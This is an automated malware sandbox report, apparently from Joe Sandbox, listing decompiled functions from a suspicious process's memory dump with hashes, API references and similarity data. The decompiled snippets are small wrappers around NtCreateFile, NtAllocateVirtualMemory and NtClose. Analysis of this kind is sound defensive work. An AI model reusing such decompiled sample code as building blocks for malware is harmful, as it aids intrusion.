                                        • Instruction Fuzzy Hash: 3A0152B5D0010DA7DB10DAA1DC42FDEB378AB54308F0041A9E918A7281F634EB54CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004185EE Relevance: 1.5, APIs: 1, Instructions: 41filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 240 4185ee-418641 call 4191f0 NtCreateFile
                                        C-Code - Quality: 100%
                                        			E004185EE(void* __edx, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
				void* _v117;
				long _t22;
				void* _t35;

				_t16 = _a8;
				_t4 = _t16 + 0xc40; // 0xc40
				E004191F0(_t35, _a8, _t4,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
				_t22 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
				return _t22;
			}






                                        0x004185f3
                                        0x004185ff
                                        0x00418607
                                        0x0041863d
                                        0x00418641

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: b892fc7c3d32f89526bc485ca24ccdf978282edd55e961281ab76ee21fc4c6d9
                                        • Instruction ID: cdbcb532dad1f4d86e6a416a39f769c3f693724edf236f69c18b3571118cf115
                                        • Opcode Fuzzy Hash: b892fc7c3d32f89526bc485ca24ccdf978282edd55e961281ab76ee21fc4c6d9
                                        • Instruction Fuzzy Hash: A101AFB2201108BFDB58CF99DC95EEB77A9AF8C354F158248FA0D97241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004185F0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 243 4185f0-418606 244 41860c-418641 NtCreateFile 243->244 245 418607 call 4191f0 243->245 245->244
                                        C-Code - Quality: 100%
                                        			E004185F0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191F0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                        0x004185ff
                                        0x00418607
                                        0x0041863d
                                        0x00418641

                                        APIs
                                        • NtCreateFile.NTDLL(00000060,00408B23,?,00413BC7,00408B23,FFFFFFFF,?,?,FFFFFFFF,00408B23,00413BC7,?,00408B23,00000060,00000000,00000000), ref: 0041863D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction ID: 6e88bdc2a8d45a62887e6f3ef0105f77e511591ccf53121fd16df0132ea8aa9a
                                        • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                        • Instruction Fuzzy Hash: 17F0BDB2200208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004187D0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 263 4187d0-41880d call 4191f0 NtAllocateVirtualMemory
                                        C-Code - Quality: 100%
                                        			E004187D0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191F0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                        0x004187df
                                        0x004187e7
                                        0x00418809
                                        0x0041880d

                                        APIs
                                        • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193C4,?,00000000,?,00003000,00000040,00000000,00000000,00408B23), ref: 00418809
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateMemoryVirtual
                                        • String ID:
                                        • API String ID: 2167126740-0
                                        • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction ID: 706794cddc655a9f1cf9aa3041d650f47f408424a1237cb237646820d67af729
                                        • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                        • Instruction Fuzzy Hash: C6F015B2200208ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F810CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041871C Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 275 41871c-418749 call 4191f0 NtClose
                                        C-Code - Quality: 100%
                                        			E0041871C(void* __ecx, void* __edi, intOrPtr _a4, void* _a8) {
				long _t9;

				_t6 = _a4;
				_t2 = _t6 + 0x10; // 0x300
				_t3 = _t6 + 0xc50; // 0x409773
				E004191F0(__edi, _a4, _t3,  *_t2, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}




                                        0x00418723
                                        0x00418726
                                        0x0041872f
                                        0x00418737
                                        0x00418745
                                        0x00418749

                                        APIs
                                        • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 823e6fb5476441f95b6379fbc907deefe463285b48bd2d61ba24483423db4706
                                        • Instruction ID: a369d2803bbc0fa3e059b68efddf5b27a2c82fa01aefe5d45d4277076b35904f
                                        • Opcode Fuzzy Hash: 823e6fb5476441f95b6379fbc907deefe463285b48bd2d61ba24483423db4706
                                        • Instruction Fuzzy Hash: 7CE0C2392001007FD710DF98CC84FE77B69EF44310F09409AFA589B342C130E500C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00418720 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00418720(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409773
				E004191F0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                        0x00418723
                                        0x00418726
                                        0x0041872f
                                        0x00418737
                                        0x00418745
                                        0x00418749

                                        APIs
                                        • NtClose.NTDLL(00413D60,?,?,00413D60,00408B23,FFFFFFFF), ref: 00418745
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_vbc.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close
                                        • String ID:
                                        • API String ID: 3535843008-0
                                        • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction ID: 78d7ac03eca040244b58aa8b13355d71f7060bfbe0c396a3df5df4df45d4e392
                                        • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                        • Instruction Fuzzy Hash: D4D01776200218BBE710EF99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007A0078 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                        • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                        • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                        • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007A0048 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                        • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                        • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                        • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 007A00C4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                        • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                        • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                        • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079F900 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                        • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                        • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                        • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                        • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                        • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                        • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                        • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                        • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                        • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FAD0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                        • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                        • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                        • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                        • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                        • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                        • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FBB8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                        • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                        • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                        • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                        • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                        • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                        • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FC90 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                        • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                        • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                        • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0079FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00780000, based on PE: true
                                        • Associated: 00000005.00000002.511971685.0000000000780000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513485994.0000000000870000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513848842.0000000000880000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513861708.0000000000884000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513872794.0000000000887000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.513891409.0000000000890000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.514374458.00000000008F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_780000_vbc.jbxd
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
